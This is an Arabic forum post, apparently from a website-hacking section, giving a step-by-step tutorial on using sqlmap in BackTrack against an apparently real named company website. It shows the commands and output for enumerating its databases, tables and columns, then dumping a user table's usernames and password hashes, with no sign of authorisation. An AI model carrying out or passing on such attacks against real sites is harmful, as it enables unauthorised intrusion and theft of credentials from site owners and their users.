استغال ثغرات sql في الباك تراك
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك
اسم الأداة :sqlmap
مسار الاداة : /pentest/database/sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql
كود:
[COLOR=Blue]http://www.bcspeakers.com/page.php?id=22[/COLOR]
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
كود:
[COLOR=Blue]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs[/COLOR]
النتيجة
كود:
[COLOR=Blue]available databases [2]:
[*] information_schema
[*] www-bcspeakerstest[/COLOR]
"www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل
كود:
[COLOR=Blue]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables[/COLOR]
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي
كود:
[COLOR=Blue]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-[/COLOR][COLOR=Blue]bcspeakerstest [/COLOR][COLOR=Blue]-T _user --columns[/COLOR]
كود:
[COLOR=Blue]+----------+---------------------------+
| Column | Type |
+----------+---------------------------+
| id_user | int(10) unsigned zerofill |
| password | text |
| username | text |
+----------+---------------------------+[/COLOR]
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
كود:
[COLOR=Blue]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump[/COLOR]
كود:
[COLOR=Blue]+--------------+
| username |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+[/COLOR]
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد
كود:
[COLOR=Blue]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump[/COLOR]
سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة
كود:
[COLOR=Blue]recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q][/COLOR]
انا اخترت لا لتسريع العملية والنتيجة كالتالي
كود:
[COLOR=Blue]+----------------------------------+
| password |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+[/COLOR]
كما ترون تم استخراج البيانات بسرعة كبيرة
اتمنى ان يعجبكم الشرح
والسلام عليكم ورحمة الله وبركاته
اسم الموضوع : استغال ثغرات sql في الباك تراك
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات